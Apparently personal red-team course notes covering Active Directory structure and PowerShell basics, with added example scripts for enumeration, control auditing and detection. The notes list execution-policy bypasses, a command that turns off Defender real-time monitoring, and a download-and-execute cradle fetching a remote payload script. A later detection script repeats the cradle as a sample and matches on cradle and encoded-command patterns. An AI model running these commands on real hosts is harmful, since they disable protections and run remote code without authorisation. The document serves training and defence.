Windows Red Team Lab notes (in progress)
Lesson 1 Basics:
Active Directory:
- Directory Service used to manage Windows networks
- stores information about objects on the network and makes it easily available to users and domains
- Active Directory enables centralized, secure management of an entire network, which might span a building, a city or multiple locations
- Schema - defines objects and their attributes
- query and index mechanism - provides searching and publication of objects and their properties
- Global Catalog - contains information about every object in the directory
- Replication Service - distributes information across domain controllers
- Forests, domains and organizational units (OUs) are the basic building blocks of any Active Directory structure.
- a forest is a security boundary - it may contain multiple domains and each domain may contain multiple OUs.
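Added example (not part of the course notes): the building blocks listed above, read straight from the directory with the .NET DirectoryServices classes, so no RSAT module is needed. It assumes it runs on a domain-joined host that can reach a domain controller; the output shows the forest, its schema naming context, each domain with its top-level OUs, and the global catalog servers.

```powershell
# Added example: enumerate forest -> domains -> OUs and the global catalogs via .NET.
# Assumes a domain-joined host with a reachable DC; otherwise it warns and stops.
Add-Type -AssemblyName System.DirectoryServices

try {
    $forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
} catch {
    Write-Warning "Not domain-joined or no DC reachable: $($_.Exception.Message)"
    return
}

"Forest (security boundary): $($forest.Name)"
"Forest functional level    : $($forest.ForestMode)"
"Schema naming context      : $($forest.Schema.Name)"   # the schema defines objects and attributes

foreach ($domain in $forest.Domains) {
    "Domain: $($domain.Name)  (PDC emulator: $($domain.PdcRoleOwner.Name))"
    # Each domain holds its own OUs; list the top-level ones with an LDAP search
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot  = $domain.GetDirectoryEntry()
    $searcher.Filter      = '(objectClass=organizationalUnit)'
    $searcher.SearchScope = 'OneLevel'
    $searcher.PropertiesToLoad.Add('name') | Out-Null
    foreach ($ou in $searcher.FindAll()) { "  OU: $($ou.Properties['name'][0])" }
}

# Global catalogs hold a partial replica of every object in the forest
"Global catalog servers:"
foreach ($gc in $forest.FindAllGlobalCatalogs()) { "  $($gc.Name)" }
```

Run it from a normal domain user session; reading the forest, domain and OU structure needs no special rights, which is exactly why this structure should be treated as public information when threat modelling.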
PowerShell:
- provides access to almost everything in a Windows platform and AD environment which could be useful for an attacker
- provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes
- easy to learn and really powerful
- based on .NET framework and is tightly integrated with Windows
- PowerShell Core is platform independent
Open up Windows PowerShell ISE as an Administrator:
See file with powershell commands...
Cmdlets are used to perform an action and a .NET object is returned as the output
Cmdlets accept parameters for different operations
They have aliases.
These are NOT executables; you can write your own cmdlet with a few lines of script.
Examples:
cd C:\
dir       //this works: dir is an alias for the Get-ChildItem cmdlet
dir.exe   //this does not: there is no executable, only the cmdlet and its alias
Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet
There are many interesting cmdlets from a pentester's perspective.
For example:
get-process   //lists the processes running on the system
get-command -Name *process*
get-command -Verb set
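Added example (not from the course notes) of the "write your own cmdlet with a few lines of script" point: an advanced function that behaves like a cmdlet. It takes parameters, has an alias, supports the common parameters such as -Verbose, and returns .NET objects instead of text. The function and alias names are made up for this demonstration.

```powershell
# Added example: a cmdlet-like advanced function. Get-Command lists it with
# CommandType "Function" (compiled cmdlets show "Cmdlet"), but it is used the same way.
function Get-ProcessSummary {
    [CmdletBinding()]                     # enables -Verbose, -ErrorAction, etc.
    [Alias('gps2')]                       # an alias, just like dir -> Get-ChildItem
    param(
        [Parameter(Position = 0)]
        [string]$Name = '*',              # wildcard pattern, same semantics as Get-Process -Name
        [int]$Top = 5
    )
    Write-Verbose "Summarising processes matching '$Name'"
    Get-Process -Name $Name -ErrorAction SilentlyContinue |
        Sort-Object WorkingSet64 -Descending |
        Select-Object -First $Top |
        ForEach-Object {
            # Emit a typed object; the caller can filter, sort or export it
            [pscustomobject]@{
                Name      = $_.ProcessName
                Id        = $_.Id
                WorkingMB = [math]::Round($_.WorkingSet64 / 1MB, 1)
                Path      = $_.Path     # $null where access is denied (protected processes)
            }
        }
}

# Usage: the first two calls are equivalent, the third filters the objects it returns
Get-ProcessSummary -Name 'power*' -Top 3 -Verbose
gps2 power* -Top 3
Get-ProcessSummary | Where-Object WorkingMB -gt 50

# It is discoverable like any other cmdlet, and its output is an object, not text
Get-Command -Name Get-ProcessSummary
Get-ProcessSummary | Get-Member -MemberType NoteProperty
```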
PowerShell ISE:
- a GUI editor/scripting environment
- tab completion, context-sensitive help, syntax highlighting, selective execution and in-line help are some of the useful features
- comes with a handy console pane to run commands from the ISE
Execution Policy:
- this is NOT a security measure, but a prevention measure to stop a user from accidentally executing scripts
- several ways to bypass:
powershell -ExecutionPolicy bypass .\script.ps1
powershell -c <cmd>
powershell -enc <base64 of the UTF-16LE encoded command>
Turn off Windows Defender real-time monitoring:
Set-MpPreference -DisableRealtimeMonitoring $true
.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1
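Added example (not from the course notes), from the defender's side of the execution policy point above: since execution policy is not a security boundary, this function reports the controls that actually matter on a host. It shows the policy at every scope (only the MachinePolicy scope set by GPO resists -ExecutionPolicy Bypass), Defender real-time protection, and whether script block logging, module logging and transcription are enforced by policy. The registry paths are the standard PowerShell policy keys; the function name is made up. Run it from an elevated prompt for complete results.

```powershell
# Added example: audit the PowerShell-related controls a defender relies on.
function Get-PowerShellControlState {
    [CmdletBinding()]
    param()

    # 1. Execution policy per scope. A GPO-set MachinePolicy is the one scope a
    #    user cannot override with -ep bypass; the others are convenience settings.
    $policies = Get-ExecutionPolicy -List |
        ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }

    # 2. Defender real-time monitoring (Get-MpComputerStatus comes with the Defender module)
    $rtp = $null
    if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        $rtp = (Get-MpComputerStatus).RealTimeProtectionEnabled
    }

    # 3-5. Logging controls as enforced by policy (registry keys written by GPO)
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $sbl = (Get-ItemProperty -Path "$base\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
    $ml  = (Get-ItemProperty -Path "$base\ModuleLogging"      -ErrorAction SilentlyContinue).EnableModuleLogging      -eq 1
    $tr  = (Get-ItemProperty -Path "$base\Transcription"      -ErrorAction SilentlyContinue).EnableTranscripting      -eq 1

    [pscustomobject]@{
        ExecutionPolicies  = $policies -join ', '
        DefenderRealTime   = $rtp            # $null when the Defender module is absent
        ScriptBlockLogging = $sbl            # feeds event ID 4104
        ModuleLogging      = $ml             # feeds event ID 4103
        Transcription      = $tr
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode   # ConstrainedLanguage is the restrictive one
    }
}

Get-PowerShellControlState | Format-List
```

A host where DefenderRealTime is $false or ScriptBlockLogging is $false is the condition the commands above aim for, so these two values are what a baseline check or a detection rule should alert on when they change.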
- PowerShell also supports modules.
- A module can be imported with:
Import-Module <path to module>
- all the commands in a module can be listed with:
Get-Command -Module <modulename>
Get-Command -Module ScheduledTasks   //e.g. the module that provides Get-ScheduledTask
Get-command -module
################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' in front of the path (above) is called dot sourcing: the script runs in the current scope, so the functions and variables it defines stay available afterwards.
################
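Added example (not from the course notes) tying together the module and dot-sourcing points above: it writes a throwaway script module and a plain script into a temp folder, imports the module, lists its commands with Get-Command -Module, and then shows the difference between running a script with the call operator and dot sourcing it. The folder, module and function names are made up for the demonstration.

```powershell
# Added example: modules vs. dot sourcing, using files created on the fly.
$work = Join-Path $env:TEMP 'psdemo'
New-Item -ItemType Directory -Path $work -Force | Out-Null

# A script module is a .psm1 file; its exported functions become commands
$moduleFile = Join-Path $work 'DemoTools.psm1'
@'
function Get-DemoGreeting { param([string]$Who = 'world') "hello, $Who" }
function Get-DemoTime     { Get-Date -Format 'u' }
Export-ModuleMember -Function Get-DemoGreeting, Get-DemoTime
'@ | Set-Content -Path $moduleFile

Import-Module $moduleFile -Force          # Import-Module <path to module>
Get-Command -Module DemoTools             # lists Get-DemoGreeting and Get-DemoTime
Get-DemoGreeting -Who 'lab'

# A plain .ps1: invoking it with & runs its body in a child scope, so the
# functions it defines are gone afterwards; dot sourcing runs it in the caller's scope
$scriptFile = Join-Path $work 'Helper.ps1'
'function Get-DemoHelper { "helper loaded" }' | Set-Content -Path $scriptFile

& $scriptFile                                             # call operator: child scope
Get-Command Get-DemoHelper -ErrorAction SilentlyContinue  # returns nothing
. $scriptFile                                             # dot sourcing: current scope
Get-DemoHelper                                            # "helper loaded"

# Clean up
Remove-Module DemoTools
Remove-Item $work -Recurse -Force
```

This is also why dot sourcing a downloaded script (as in the Invoke-Encode.ps1 line above) is worth logging: everything the file defines lands in the interactive session, and with script block logging enabled the whole file content is recorded in event ID 4104.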
Whenever there is a command execution opportunity, PowerShell scripts can be executed using the following methods:
- Download execute cradle
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')
- EncodedCommand
powershell.exe -?   //lists the powershell.exe command-line options, including -EncodedCommand
Check out Invoke-CradleCrafter:
https://ift.tt/2wzL4is
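Added example (not from the course notes), covering the two execution methods above from the detection side: a filter that a defender can run over script block text as recorded in PowerShell event ID 4104, flagging download-and-execute cradles and -EncodedCommand invocations, and decoding the base64 so an analyst sees the real command. The three sample script blocks are constructed here for the demo (the encoded one wraps a harmless Get-Date); nothing is downloaded or executed. The function name is made up.

```powershell
# Added example: detection logic for download cradles and encoded commands in script block text.
function Test-SuspiciousScriptBlock {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$ScriptBlockText)
    process {
        $findings = @()

        # Download cradle: a web fetch whose result is fed to IEX / Invoke-Expression
        if ($ScriptBlockText -match '(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)' -and
            $ScriptBlockText -match '(\biex\b|Invoke-Expression)') {
            $findings += 'download cradle'
        }

        # -EncodedCommand (or its short forms -e/-ec/-enc) followed by a base64 blob.
        # PowerShell encodes the command as UTF-16LE before base64, so decode the same way.
        if ($ScriptBlockText -match '-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})') {
            try {
                $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
                $findings += "encoded command: $decoded"
            } catch {
                $findings += 'encoded command (undecodable)'
            }
        }

        [pscustomobject]@{
            Suspicious = $findings.Count -gt 0
            Findings   = $findings -join '; '
            Sample     = $ScriptBlockText.Substring(0, [Math]::Min(60, $ScriptBlockText.Length))
        }
    }
}

# Constructed samples: a benign line, a cradle, and an encoded command built from a harmless payload
$benignB64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Date'))
$samples = @(
    'Get-ChildItem C:\Users | Select-Object Name',
    "iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')",
    "powershell.exe -nop -w hidden -enc $benignB64"
)
$samples | Test-SuspiciousScriptBlock | Format-Table -AutoSize

# Against real logs (script block logging must be enabled; ScriptBlockText is property index 2 of event 4104):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Test-SuspiciousScriptBlock | Where-Object Suspicious
```

The patterns are deliberately simple; Invoke-CradleCrafter exists precisely to produce cradles that string matching like this misses, which is the argument for logging and reviewing decoded script blocks rather than relying on a fixed signature list.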
#####################
Lesson 2 Domain Enumeration: